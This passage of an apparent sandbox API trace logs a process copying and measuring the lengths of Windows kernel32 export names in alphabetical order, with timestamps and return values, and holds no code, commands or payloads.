(lpString="CREATEACTCTXW") returned 13 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.303] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.303] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.303] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.304] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.304] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.304] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.304] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.304] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.304] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.304] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.304] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.304] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.304] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.304] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.304] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.304] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.304] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.304] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.304] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.304] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.305] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.305] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.305] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.305] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.305] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.305] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.305] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.305] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.305] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.305] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.305] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.305] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.305] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.305] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.305] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.305] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.305] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.305] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.306] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.306] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.306] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.306] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.306] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.306] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.306] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.306] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.306] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.306] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.306] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.306] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.306] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.306] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.306] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.306] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.306] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.306] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.306] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.307] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.307] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.307] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.307] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.307] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.307] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.307] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.307] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.307] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.307] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.307] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.307] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.307] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.307] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.307] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.307] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.307] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.307] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.308] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.308] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.308] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.308] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.308] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.308] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.308] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.308] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.308] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.308] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.308] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.308] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.308] lstrlenA (lpString="DELETEATOM") returned 10 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.308] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.308] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.308] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.308] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.308] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.309] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.309] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.309] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.309] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.309] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.309] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.309] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.309] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.309] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.309] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.309] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.309] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.309] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.309] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.309] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.309] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.309] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.309] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.309] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.310] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.310] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.310] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.310] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.310] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.310] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.310] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.310] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.310] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.310] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.310] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.310] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.310] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.310] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.310] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.310] 